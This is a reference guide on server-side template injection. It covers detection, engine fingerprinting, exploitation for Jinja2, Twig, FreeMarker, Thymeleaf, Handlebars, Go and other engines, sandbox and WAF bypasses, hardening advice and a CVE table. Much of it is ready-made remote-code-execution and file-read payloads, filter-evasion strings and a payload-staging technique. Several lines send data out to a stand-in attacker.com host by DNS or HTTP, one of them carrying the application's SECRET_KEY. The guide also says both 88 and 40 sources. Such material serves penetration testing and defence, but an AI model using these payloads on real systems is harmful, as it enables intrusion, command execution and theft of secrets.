Comprehensive SSTI Guide

🆕 Enhanced May 2, 2026 - Updated with 88 sources and template injection CVEs including engine-specific exploits, AI/ML platform vulnerabilities, and RCE payload development techniques.

A practitioner’s reference for Server-Side Template Injection — template engine vulnerabilities, exploitation techniques, payload development, framework-specific attacks, and defense strategies. Covers detection methodologies, engine-specific exploitation, and secure templating practices. Compiled from 88 research sources including latest AI/ML platform vulnerabilities.

Fundamentals
Detection & Identification
Template Engine Exploitation
Framework-Specific Attacks
Payload Development
Advanced Exploitation
Bypass Techniques
Testing Methodology
Secure Implementation
Detection & Prevention
CVE Reference

1. Fundamentals

SSTI Attack Surface

Template Context	Risk Level	Common Locations
User Input Rendering	Critical	Email templates, reports, dynamic pages
Configuration Files	High	Template-based configs, dynamic routing
Error Messages	Medium	Custom error pages, debug output
Log Messages	Low	Log formatting, audit trails
Email Workflow Templates	Critical	Notification templates, marketing emails (Shopify Return Magic, Fides)
Recipe/CMS Content Fields	Critical	User-editable content rendered by template engines (Tandoor Recipes, Alfresco)
JMS/Message Headers	High	Apache Camel template override headers (CamelFreemarkerTemplate, CamelVelocityTemplate)

Template Engine Landscape

Engine	Language	Popularity	Exploitation Difficulty
Jinja2	Python	Very High	Medium
Twig	PHP	High	Medium
FreeMarker	Java	High	High
Velocity	Java	Medium	High
Thymeleaf	Java	Medium	Medium
Smarty	PHP	Medium	Low
Mako	Python	Low	Low
Handlebars	Node.js	Very High	Medium
Pug (Jade)	Node.js	High	Medium
Go html/template	Go	Medium	High (context-dependent)
Go text/template	Go	Medium	Medium
Jelly	Java	Medium (ServiceNow)	Medium
MVEL	Java	Low	Low
Mustache	Multi-language	Medium	High (logicless by design)
Tornado	Python	Medium	Medium

2. Detection & Identification

Detection Methodology

SSTI DETECTION FLOW:
1. Identify template injection points
2. Test mathematical expressions
3. Analyze error messages
4. Determine template engine
5. Craft engine-specific payloads
6. Test blind detection via time-based or OOB channels

Basic Detection Payloads

Test Case	Payload	Expected Result
Mathematical	`${7*7}`	`49` if vulnerable
Mathematical	`{{7*7}}`	`49` if vulnerable
Mathematical	`<%=7*7%>`	`49` if vulnerable
String Concatenation	`${'a'+'b'}`	`ab` if vulnerable
Function Call	`${T(java.lang.System).getProperty('user.name')}`	Username if Spring EL
Go Detection	`{{ . }}`	Memory address of passed object if Go template
Handlebars Detection	`{{this}}`	`[object Object]` if Handlebars
FreeMarker String	`${"Hello " + "World"}`	`Hello World` if FreeMarker
FreeMarker Array	`${["one", "two", "three"][1]}`	`two` if FreeMarker
FreeMarker Length	`${"test"?length}`	`4` if FreeMarker
FreeMarker Date	`${.now?string("yyyy-MM-dd")}`	Current date if FreeMarker
Jelly (ServiceNow)	`<g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate>`	`1337` in error message
Thymeleaf Inline	`[[${7*7}]]`	`49` if Thymeleaf expression inlining

Template Engine Fingerprinting

IDENTIFICATION DECISION TREE:
├── {{7*7}} = 49
│   ├── {{this}} = [object Object] → Handlebars (Node.js)
│   ├── Jinja2 (Python)
│   ├── Twig (PHP) 
│   └── Nunjucks (Node.js)
├── ${7*7} = 49
│   ├── ${"test"?length} = 4 → FreeMarker (Java)
│   ├── ${T(java.lang.Runtime)} works → Spring EL (Java)
│   └── Velocity (Java)
├── <%=7*7%> = 49
│   ├── ERB (Ruby)
│   └── ASP Classic
├── {7*7} = 49
│   └── Smarty (PHP)
├── {{ . }} = memory address
│   └── Go html/template or text/template
├── [[${7*7}]] = 49
│   └── Thymeleaf (Java) expression inlining
└── <g:evaluate>...</g:evaluate> executes
    └── Jelly (ServiceNow)

Method	Payload Example	Verification
Time-based (Jinja2)	`{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('sleep 10').read()}}`	Response delay
Time-based (FreeMarker)	`<#assign ex="freemarker.template.utility.Execute"?new()>${ex("sleep 10")}`	Response delay
DNS Exfiltration	`{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('nslookup x.attacker.com').read()}}`	DNS logs
HTTP Callback	Jinja2 urllib.request.urlopen to attacker URL	HTTP logs

3. Template Engine Exploitation

Jinja2 (Python) Exploitation

Attack Vector	Payload	Impact
Basic RCE	`{{config.__class__.__init__.__globals__['os'].popen('id').read()}}`	Command execution
Subprocess	`{{''.__class__.__mro__[1].__subclasses__()[104].__init__.__globals__['sys'].modules['subprocess'].check_output('whoami',shell=True)}}`	Command execution
File Read	`{{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}`	File access
Config Access	`{{config.SECRET_KEY}}`	Sensitive data exposure
Lipsum Shorthand	`{{lipsum.__globals__}}`	Bypass length limits
Cycler RCE	`{{cycler.__init__.__globals__.os.popen('id').read()}}`	Shorter RCE payload
Hex-encoded attr()	`{{()\|attr('\x5f\x5fclass\x5f\x5f')\|attr('\x5f\x5fbase\x5f\x5f')\|attr('\x5f\x5fsubclasses\x5f\x5f')()\|attr('\x5f\x5fgetitem\x5f\x5f')(418)('id',shell=True,stdout=-1)\|attr('communicate')()\|attr('\x5f\x5fgetitem\x5f\x5f')(0)\|attr('decode')('utf-8')}}`	Filter bypass RCE (CVE-2025-23211)
Warning class import	`{% for s in ().__class__.__base__.__subclasses__() %}{% if "warning" in s.__name__ %}{{s()._module.__builtins__['__import__']('os').popen("env").read()}}{% endif %}{% endfor %}`	RCE via warning subclass (Fides advisory)

Twig (PHP) Exploitation

TWIG ATTACK PATTERNS:
├── Filter Abuse
│   ├── {{_self.env.registerUndefinedFilterCallback("exec")}}
│   ├── {{_self.env.getFilter("id")}}
│   └── {{["id"]|filter("system")}}
├── Function Injection
│   ├── {{_self.env.registerUndefinedFunction("exec")}}
│   └── {{_self.env.getFunction("system")}}
├── Object Injection
│   ├── {{app.request.query.get('cmd')|passthru}}
│   └── {{dump(app)}} (information disclosure)
└── Escape Handler Abuse (Grav CMS — GHSA-2m7x-c7px-hp58)
    ├── {{ grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter') }}
    └── {{ ['id'] | escape('system', 'system') }}
    (Redefine escape function via setEscaper to system(), bypasses sandbox when not enabled)

FreeMarker (Java) Exploitation

Technique	Payload	Description
Object Creation	`<#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}`	Command execution
Static Method Call	`${"freemarker.template.utility.ObjectConstructor"?new()("java.lang.ProcessBuilder","id").start()}`	Process creation
File System Access	`<#assign fos=freemarker.template.utility.ObjectConstructor("java.io.FileOutputStream","/tmp/test")>`	File manipulation
?lower_abc Filter Bypass	`${(6?lower_abc+18?lower_abc+...)?new()(9?lower_abc+4?lower_abc)}`	Reconstruct “freemarker.template.utility.Execute” char-by-char to bypass keyword blocklists
CamelContext Sandbox Escape	`<#assign cr=camelContext.getClassResolver()><#assign i=camelContext.getInjector()><#assign se=i.newInstance(cr.resolveClass('javax.script.ScriptEngineManager'))>${se.getEngineByName("js").eval("...")}`	RCE even with ClassResolver sandbox enabled (Apache Camel)
CamelContext Language	`$camelContext.resolveLanguage("groovy").createExpression(<PAYLOAD>).evaluate(exchange, Object.class)`	Groovy expression via Camel context
Alfresco Sandbox Bypass	Exploit exposed objects in FreeMarker templates to bypass restrictions (CVE-2023-49964, incomplete fix for CVE-2020-12873)	RCE in Alfresco CMS

Handlebars (Node.js) Exploitation

Technique	Payload	Description
Prototype Pollution + AST Injection	Pollute `Object.prototype.type = 'Program'` and `Object.prototype.body` with crafted AST containing RCE in NumberLiteral value	Bypass parser validation, inject code directly into compiler
Constructor Chain	`{{#with “s” as	string
toString Override + bind()	Override `Object.prototype.toString` via `defineProperty`, use `bind()` to create function returning attacker payload, then invoke via Function constructor	Full RCE without scope-defined functions (Shopify Return Magic)
pendingContent Detection	Pollute `Object.prototype.pendingContent` with test string	Detect Handlebars engine in black-box with prototype pollution

Pug (Node.js) Exploitation

Technique	Payload	Description
AST Injection via block	Pollute `Object.prototype.block = {"type":"Text","val":"<script>alert(origin)</script>"}`	XSS/content injection via prototype pollution
Code Injection via line	Pollute `Object.prototype.block.type = "Code"` with `body` containing RCE payload	Command execution via AST manipulation

Thymeleaf (Java) Exploitation

THYMELEAF ATTACK PATTERNS:
├── Expression Preprocessing Double-Eval
│   ├── __${path}__ preprocesses user input, result evaluated as expression
│   ├── URL path injection: http://target/(${T(java.lang.Runtime).getRuntime().exec('calc')})
│   └── Works on Jetty (allows {} in path), blocked on Tomcat (URL-encodes {})
├── Spring Boot 3.3.4 Denylist Bypass (modzero research)
│   ├── Thymeleaf blocks T() for static class access and org.springframework.util.ReflectionUtils
│   ├── Bypass via org.apache.commons.lang3.reflect.MethodUtils (not on denylist)
│   ├── "".class.forName("org.apache.commons.lang3.reflect.MethodUtils")
│   │   .invokeMethod(
│   │     "".class.forName("org.apache.commons.lang3.reflect.MethodUtils")
│   │       .invokeStaticMethod("".class.forName("java.lang.Runtime"),"getRuntime"),
│   │     "exec", "whoami")
│   └── Full payload reads command output via IOUtils + file write for non-blind RCE
├── CVE-2023-38286 (Spring Boot Admin)
│   ├── Bypass Thymeleaf blacklists via ReflectionUtils (older versions)
│   ├── th:with chaining: findMethod → invokeMethod → exec
│   └── Requires MailNotifier enabled + write access to env vars
└── CVE-2022-46166 (Spring Boot Admin)
    └── RCE via variable coverage in notification templates

Velocity (Java) Exploitation

Technique	Payload	Description
CamelContext RCE	`${camelContext.class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("...")}`	RCE via JavaScript engine in Apache Camel
Template Override	Send `CamelVelocityTemplate` header to override default template	Dynamic template injection via message headers
Resource URI Override	Send `CamelVelocityResourceUri` header pointing to `file:///etc/passwd`	Arbitrary file disclosure

MVEL (Java) Exploitation

Technique	Payload	Description
Direct RCE	`@{java.lang.Runtime.getRuntime().exec('id')}`	Direct runtime access
ObjectFactory RCE	`@{com.sun.org.apache.xerces.internal.utils.ObjectFactory.newInstance("javax.script.ScriptEngineManager",null,false).getEngineByName('js').eval("...")}`	Via ScriptEngine
Template Override	Send `CamelMvelTemplate` header	Apache Camel dynamic template

Go Template Exploitation

GO SSTI ATTACK PATTERNS:
├── Detection
│   └── {{ . }} — prints memory address/object dump of passed struct
├── Data Leakage
│   ├── {{ .Email }} / {{ .Password }} — access struct fields
│   └── Leaks any exported field on the passed object
├── Method Invocation
│   ├── {{ .MethodName "arg" }} — call exported methods on passed struct
│   └── Methods must be exported (capitalized) to be callable
├── Gin Framework Gadgets
│   └── {{ .Writer.WriteString "<script>alert(1)</script>" }} — XSS via response writer
├── Echo Framework Gadgets
│   ├── {{ .File "/etc/passwd" }} — arbitrary file read
│   ├── {{ .Attachment "/etc/passwd" "passwd" }} — file read via attachment
│   ├── {{ .Inline "/etc/passwd" "passwd" }} — file read inline
│   └── {{ $x:=.Echo.Filesystem.Open "/etc/hostname" }} {{ $x.Seek 1 0 }} {{ .Stream 200 "text/plain" $x }} — file read with I/O control
├── Fiber Framework Gadgets
│   ├── {{ .App.Shutdown }} — denial of service
│   └── {{ .Response.SendFile "/etc/hostname" }} {{ .Response.Body }} — file read via fasthttp.Response
├── Method Confusion (OnSecurity Research)
│   ├── If passed object type matches a method's receiver, call with custom params
│   ├── echo.Context.File("path") gadget for arbitrary file read
│   └── Gadget hunting: search imported modules for exported methods with dangerous behavior
└── text/template vs html/template
    ├── text/template allows direct "call" for public functions — higher risk
    └── html/template restricts call — requires gadget chains

Jelly (ServiceNow) Exploitation

Technique	Payload	Description
Template Injection Probe	`<g:evaluate>gs.addErrorMessage(668.5*2);</g:evaluate>`	Confirm injection via math result (1337) in error message
DB Credential Theft	Inject `<g:evaluate>` to read `glide.db.properties` via `SecurelyAccess` + `getBufferedReader()`	Extract database connection strings
Chained Exploitation	CVE-2024-4879 (title injection) + CVE-2024-5217 (mitigation bypass) + CVE-2024-5178 (file filter bypass)	Full RCE chain on ServiceNow
Style Tag Bypass	Embed Jelly tags inside `<style>` element in `jvar_page_title` parameter	Bypass basic input validation

4. Framework-Specific Attacks

Spring Framework (Java)

Context	Payload	Impact
Spring EL	`${T(java.lang.Runtime).getRuntime().exec('id')}`	RCE
SpEL Injection	`#{T(java.lang.System).getProperty('user.name')}`	Information disclosure
Request Context	`${@requestMappingHandlerMapping.getApplicationContext().getEnvironment().getProperty('java.version')}`	Environment access
Thymeleaf Double-Eval	`'+${7*7}+'` in Referer header with `__${Referer}__` preprocessing	RCE via preprocessing (modzero)
MethodUtils Bypass	`"".class.forName("org.apache.commons.lang3.reflect.MethodUtils").invokeStaticMethod(...)`	Bypass Thymeleaf denylist in Spring Boot 3.3.4+
WebAsyncManager Header Exfil	Access `#ctx.getVariable("...WebAsyncManager...")` to read request headers and write response	Non-blind RCE without outbound connections

Django (Python)

DJANGO TEMPLATE ATTACKS:
├── Debug Information
│   ├── {{settings.SECRET_KEY}}
│   ├── {{settings.DATABASES}}
│   └── {{settings.DEBUG}}
├── Object Traversal
│   ├── {{request.META}}
│   ├── {{request.user}}
│   └── {{request.session}}
└── Filter Abuse
    ├── Custom filters with dangerous functions
    └── Template tag injection

Laravel (PHP)

Attack Type	Payload	Result
Blade RCE	`@php(system('id')) @endphp`	Command execution
Variable Access	`{{$app->make('config')->get('database.default')}}`	Configuration disclosure
Helper Function	`{{app('Illuminate\Contracts\Console\Kernel')->call('route:list')}}`	Application introspection

Apache Camel (Java)

APACHE CAMEL SSTI (CVE-2020-11994):
├── Affected Components
│   ├── camel-freemarker (CamelFreemarkerTemplate header)
│   ├── camel-velocity (CamelVelocityTemplate header)
│   ├── camel-mvel (CamelMvelTemplate header)
│   └── camel-mustache (MustacheResourceUri header — file disclosure only)
├── Attack Pattern
│   ├── Override default template via message header injection
│   ├── Header source depends on consumer: JMS properties, HTTP headers, etc.
│   └── ResourceUri headers enable arbitrary file disclosure (file:///etc/passwd)
├── Sandbox Bypass
│   ├── camelContext object exposed in template context
│   ├── getInjector() + getClassResolver() → instantiate arbitrary classes
│   └── resolveLanguage("groovy") → evaluate arbitrary Groovy expressions
└── Impact
    └── RCE + Arbitrary File Disclosure across all template components

Grav CMS (PHP/Twig)

Attack Type	Payload	Result
setEscaper Abuse	`{{ grav.twig.twig.extensions.core.setEscaper('system','twig_array_filter') }}` then `{{ ['id'] \| escape('system', 'system') }}`	RCE by redefining escape filter to system()
Root Cause	Twig sandbox not enabled; unrestricted access to extension classes via template context	Arbitrary callable registration

5. Payload Development

Payload Construction Strategy

PAYLOAD DEVELOPMENT PROCESS:
├── Environment Discovery
│   ├── Available classes/modules
│   ├── Security restrictions
│   └── Execution context
├── Bypass Development
│   ├── Filter evasion
│   ├── Character restrictions
│   └── Length limitations
├── Payload Optimization
│   ├── Minimize detection
│   ├── Maximize impact
│   └── Ensure reliability
└── Multi-Stage Delivery
    ├── Store payload in persistent objects (Jinja2 config object)
    ├── Retrieve and execute across separate requests
    └── Useful when injection point has size limits (email fields)

Common Payload Patterns

Goal	Python/Jinja2	PHP/Twig	Java/FreeMarker	Node.js/Handlebars	Go
List Classes	`{{''.__class__.__mro__[1].__subclasses__()}}`	`{{dump()}}`	`<#list .data_model?keys as key>${key}</#list>`	`{{this}}`	`{{ . }}`
Execute Command	`{{cycler.__init__.__globals__.os.popen('id').read()}}`	`{{_self.env.registerUndefinedFilterCallback("system")}}`	`<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}`	Prototype pollution + AST injection	N/A (gadget-dependent)
Read File	`{{get_flashed_messages.__globals__['current_app'].open_resource('../../../etc/passwd').read()}}`	`{{include('/etc/passwd')}}`	`<#assign file=...ObjectConstructor("java.io.File","/etc/passwd")>`	N/A	`{{ .File "/etc/passwd" }}` (Echo)

Size-Limited Payload Technique (Jinja2)

MULTI-REQUEST PAYLOAD STAGING:
1. Store payload in config object via short injection:
   {{config.update(a=request.args.get('a'))}}
   with URL parameter: ?a=<long RCE payload>

2. Verify storage:
   {{config.a}}

3. Execute stored payload:
   {{''.__class__.__mro__[1].__subclasses__()...__globals__['os'].popen(config.a).read()}}

Use case: SSTI in email fields with RFC-imposed size limits

6. Advanced Exploitation

Detection Method	Payload	Verification
Time-based	`{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['time'].sleep(5)}}`	Response delay
DNS Exfiltration	`{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['os'].popen('nslookup` whoami`.attacker.com').read()}}`	DNS logs
HTTP Callback	`{{''.__class__.__mro__[1].__subclasses__()[59].__init__.__globals__['urllib'].request.urlopen('http://attacker.com/'+config.SECRET_KEY)}}`	HTTP logs

Sandbox Escape Techniques

SANDBOX BYPASS METHODS:
├── Python/Jinja2
│   ├── __builtins__ access via globals
│   ├── Class traversal to dangerous modules
│   ├── Import statement reconstruction
│   └── Warning subclass → __builtins__['__import__'] chain
├── Java/FreeMarker
│   ├── ObjectConstructor for arbitrary class instantiation
│   ├── Static method calls via ?new()
│   ├── Reflection API abuse
│   ├── CamelContext.getInjector() + getClassResolver() (Apache Camel)
│   └── ScriptEngineManager for Groovy/JavaScript eval
├── Java/Thymeleaf
│   ├── Expression preprocessing (__...__) double-evaluation
│   ├── org.apache.commons.lang3.reflect.MethodUtils (bypass Spring Boot 3.3.4 denylist)
│   ├── "".class.forName() to load arbitrary classes
│   └── ReflectionUtils (older versions, now denylisted)
├── PHP/Twig
│   ├── Filter/function registration
│   ├── Object property access
│   ├── Include/eval function calls
│   └── setEscaper() to redefine escape function as system() (Grav CMS)
└── Node.js/Handlebars
    ├── AST Injection via prototype pollution (bypass parser entirely)
    ├── Function constructor via this.constructor.constructor
    ├── Object.prototype.toString override + bind() for RCE
    └── Built-in helper abuse (with, blockHelperMissing)

Prototype Pollution to SSTI (Node.js)

PROTOTYPE POLLUTION → SSTI CHAIN:
├── Handlebars
│   ├── Pollute Object.prototype.type = "Program"
│   ├── Pollute Object.prototype.body with AST containing RCE in NumberLiteral.value
│   ├── Template string bypasses parser (treated as pre-parsed AST)
│   └── Compiler executes injected code directly
├── Pug
│   ├── Pollute Object.prototype.block with {type:"Text", val:"<payload>"}
│   ├── When ast.type is "While", walkAST follows ast.block (uses prototype)
│   └── High reliability: any template referencing arguments triggers it
└── Detection
    ├── Handlebars: Object.prototype.pendingContent = "<test>" → appears in output
    └── Pug: Object.prototype.block = {type:"Text", val:"<test>"} → appears in output

7. Bypass Techniques

Filter Evasion

Restriction	Bypass Technique	Example
Keyword Blacklist	String concatenation	`{{'sy'+'stem'}}`
Character Filtering	Unicode/Encoding	`{{'\u0073\u0079\u0073\u0074\u0065\u006d'}}`
Length Limits	Shortened payloads	`{{lipsum.__globals__}}`
Quotes Blocked	String methods	`{{request.args.cmd\|system}}`
Keyword Blacklist (FreeMarker)	?lower_abc encoding	`6?lower_abc` = “f”, reconstruct class names char-by-char
Attribute Name Filtering	Hex-encoded attr()	`\|attr('\x5f\x5fclass\x5f\x5f')` instead of `.__class__`
Size Limit	Config object staging	Store payload in `config.a` via one request, execute in another
Thymeleaf Static Class Block	commons-lang3 MethodUtils	Use `"".class.forName(...)` to load non-denylisted reflection class
ServiceNow Mitigation	Style tag wrapper + Jelly xmlns	Embed `<g:evaluate>` inside `<style>` tags

WAF Bypass Strategies

WAF EVASION TECHNIQUES:
├── Encoding Variations
│   ├── URL encoding (%7B%7B)
│   ├── Unicode encoding (\u007B\u007B)
│   └── HTML entity encoding (&lbrace;&lbrace;)
├── Structure Manipulation
│   ├── Whitespace insertion {{  7*7  }}
│   ├── Comment insertion {# comment #}
│   └── Nested expressions {{7*{{7}}}}
├── Payload Fragmentation
│   ├── Multi-step injection
│   ├── Context-dependent payloads
│   └── Request splitting
├── FreeMarker-Specific
│   ├── ?lower_abc / ?upper_abc character reconstruction
│   ├── 1.1?c[1] to generate dot character
│   └── Numeric built-in abuse to construct arbitrary strings
└── Thymeleaf-Specific
    ├── Preprocessor double-evaluation via __${...}__
    ├── @{} link expression parentheses to clear context
    └── Server-specific: Jetty allows {} in URL path, Tomcat blocks

8. Testing Methodology

Manual Testing Workflow

Phase	Activities	Tools/Techniques
Discovery	Input point identification	Burp Suite, manual analysis
Detection	Template injection testing	Mathematical expressions, error analysis
Identification	Template engine fingerprinting	Specific syntax testing, decision tree
Exploitation	Payload development	Engine documentation, trial and error
Impact Assessment	Privilege escalation, data access	Full exploitation chains
Blind Validation	Time-based and OOB testing	sleep commands, DNS/HTTP callbacks

Automated Testing Tools

SSTI TESTING ARSENAL:
├── Detection Tools
│   ├── tplmap (comprehensive scanner — epinna)
│   ├── SSTImap (exploitation framework — vladko312)
│   ├── Burp extensions (various)
│   └── Nuclei templates (e.g., CVE-2024-5217.yaml)
├── Payload Generators
│   ├── PayloadsAllTheThings (payload collection)
│   ├── SecLists (template payloads)
│   └── Custom scripts
├── Framework-Specific
│   ├── j2eeTester (Java templates)
│   ├── TwigSecurityChecker (Twig)
│   └── JinjaSecurityScanner (Jinja2)
├── Reconnaissance
│   ├── Shodan/Censys/FOFA (identify exposed instances, e.g., ServiceNow)
│   └── Nuclei for automated version/vulnerability probing
└── CI/CD Integration
    ├── SAST rules: flag {{{ in .hbs files (Handlebars triple braces)
    ├── Secrets scanners: detect credentials in templates
    └── Build guardrails: break on unsafe patterns

9. Secure Implementation

Secure Template Design Principles

Principle	Implementation	Security Benefit
Input Validation	Strict allowlist validation	Prevents injection
Context Isolation	Separate template contexts	Limits impact
Minimal Privileges	Restricted template capabilities	Reduces attack surface
Output Encoding	Automatic encoding	Prevents XSS
Sandbox Enforcement	Enable template engine sandbox mode	Limits exploitation scope
Least Privilege Containers	Run containers as non-root	Limits post-exploitation impact (CVE-2025-23211)

Framework-Specific Security

SECURE CONFIGURATION:
├── Jinja2/Django
│   ├── autoescape=True (XSS prevention)
│   ├── Restrict dangerous globals
│   ├── Custom filter validation
│   └── Use SandboxedEnvironment for user-controlled templates
├── Twig/Symfony
│   ├── Strict mode enabled
│   ├── Sandbox mode for user content (prevents setEscaper abuse)
│   ├── Function/filter allowlisting
│   └── Block access to internal extension objects
├── FreeMarker/Spring
│   ├── Restricted method calls
│   ├── Template loading restrictions
│   ├── API access controls
│   └── Use TemplateClassResolver.ALLOWS_NOTHING_RESOLVER
├── Thymeleaf/Spring Boot
│   ├── Avoid expression preprocessing (__...__) with user input
│   ├── Denylist covers java.*, javax.*, org.springframework.util.*
│   ├── Audit third-party libs (commons-lang3 MethodUtils still exploitable)
│   └── Prefer Tomcat over Jetty (Tomcat blocks {} in URL paths)
├── Handlebars/Node.js
│   ├── Always use double braces {{ }} (auto-escaping), never triple {{{ }}}
│   ├── Audit custom helpers — never use SafeString with user input
│   ├── Protect against prototype pollution (freeze Object.prototype, use Maps)
│   └── Keep dependencies updated (prototype pollution CVEs)
├── Go Templates
│   ├── Prefer html/template over text/template (restricts "call")
│   ├── Never pass entire framework context (gin.Context, echo.Context) to templates
│   ├── Create minimal view structs with only needed fields
│   └── Avoid exported methods with dangerous behavior on passed types
├── ServiceNow/Jelly
│   ├── Apply vendor patches promptly (CVE-2024-4879 exploited in wild)
│   ├── Sanitize jvar_page_title and similar parameters
│   └── Monitor for Jelly tag injection patterns in logs
└── General Practices
    ├── Pre-compile templates (never build from user strings)
    ├── Validate all inputs
    ├── Monitor template rendering
    └── Run applications as non-root in containers

10. Detection & Prevention

Runtime Protection

Control	Implementation	Effectiveness
Input Sanitization	Remove template syntax	High (if comprehensive)
Template Sandboxing	Restricted execution environment	Medium (bypass possible)
Content Security Policy	Restrict dynamic content	Low (server-side attack)
Web Application Firewall	Pattern-based blocking	Medium (bypass common)
Prototype Pollution Prevention	Object.freeze, Map usage, input validation	High (prevents AST injection in Node.js)

Monitoring & Detection

DETECTION STRATEGIES:
├── Log Analysis
│   ├── Template rendering errors
│   ├── Unusual template patterns ({{, ${, <#, <g:evaluate>)
│   ├── Performance anomalies
│   └── ServiceNow: monitor login.do for Jelly tag injection
├── Runtime Monitoring
│   ├── Template execution time (detect sleep-based blind SSTI)
│   ├── Memory consumption
│   ├── System call monitoring (exec, popen, ProcessBuilder)
│   └── DNS/HTTP outbound connections from template rendering
├── Security Scanning
│   ├── Regular SAST scans (CodeQL, Semgrep)
│   ├── DAST testing (tplmap, SSTImap, Nuclei)
│   ├── Dependency vulnerability checks (prototype pollution in Node.js)
│   └── Internet exposure scanning (Shodan, Censys, FOFA)
└── Supply Chain
    ├── Monitor npm advisories for Handlebars, Pug, flat
    ├── Track Java dependency updates (FreeMarker, Thymeleaf, commons-lang3)
    └── Automated SCA in CI/CD pipelines

Incident Response

Phase	Actions	Considerations
Detection	Log analysis, alert investigation	False positive filtering
Containment	Template access restriction	Service availability
Eradication	Vulnerable template removal	Code deployment
Recovery	Secure template implementation	Testing requirements
Lessons Learned	Process improvement	Training needs

11. CVE Reference

CVE	Product	Engine	CVSS	Impact
CVE-2024-4879	ServiceNow	Jelly	9.3	Unauthenticated RCE via title injection
CVE-2024-5217	ServiceNow	Jelly	9.2	Template injection mitigation bypass
CVE-2024-5178	ServiceNow	Jelly	6.9	Filesystem filter bypass, sensitive file read
CVE-2026-5760	SGLang	Template Engine	9.8	RCE via malicious GGUF model files
CVE-2025-61620	AI Model Platform	Jinja2	8.5	Template injection in model configuration
CVE-2025-23211	Tandoor Recipes	Jinja2	9.9	Authenticated SSTI to root RCE in Docker
CVE-2023-38286	Spring Boot Admin	Thymeleaf	–	RCE via Thymeleaf blacklist bypass
CVE-2022-46166	Spring Boot Admin	Thymeleaf	–	RCE via variable coverage in notifiers
CVE-2023-49964	Alfresco	FreeMarker	–	SSTI sandbox bypass (incomplete fix of CVE-2020-12873)
CVE-2020-12873	Alfresco	FreeMarker	–	Original SSTI via exposed FreeMarker objects
CVE-2020-11994	Apache Camel	FreeMarker/Velocity/MVEL/Mustache	–	RCE + file disclosure via template header override
CVE-2024-29178	Apache StreamPark	FreeMarker	–	FreeMarker SSTI to RCE
CVE-2019-20920	Handlebars (npm)	Handlebars	–	Prototype pollution leading to RCE
GHSA-2m7x-c7px-hp58	Grav CMS	Twig	–	RCE via setEscaper() without sandbox
GHSA-c34r-238x-f7qx	Fides	Jinja2	–	RCE via unsandboxed email template rendering

Key Takeaways

Input Validation: Never trust user input in template contexts
Template Isolation: Separate user-controlled and system templates
Minimal Privileges: Restrict template engine capabilities
Regular Testing: Include SSTI in security testing processes
Framework Updates: Keep template engines updated with security patches
Sandbox Enforcement: Always enable sandbox mode when user content is rendered by template engines
Prototype Pollution Awareness: In Node.js, prototype pollution can chain to full SSTI/RCE even in “logicless” engines like Handlebars
Context Minimization: Pass only minimal data structures to templates — never entire framework contexts (Go, Spring)
Container Hardening: Run applications as non-root to limit post-exploitation impact
Supply Chain Monitoring: Track template engine dependency vulnerabilities in CI/CD

This guide compiles practical SSTI knowledge from 40 research sources. Template injection vulnerabilities remain common due to the complexity of modern template engines and their powerful features. The attack surface extends beyond traditional web frameworks to message-driven architectures (Apache Camel), CMS platforms (Alfresco, Grav), enterprise IT management (ServiceNow), and Node.js prototype pollution chains.